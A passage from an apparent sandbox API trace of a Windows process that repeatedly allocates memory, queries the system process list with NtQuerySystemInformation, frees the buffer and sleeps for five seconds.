RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.368] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 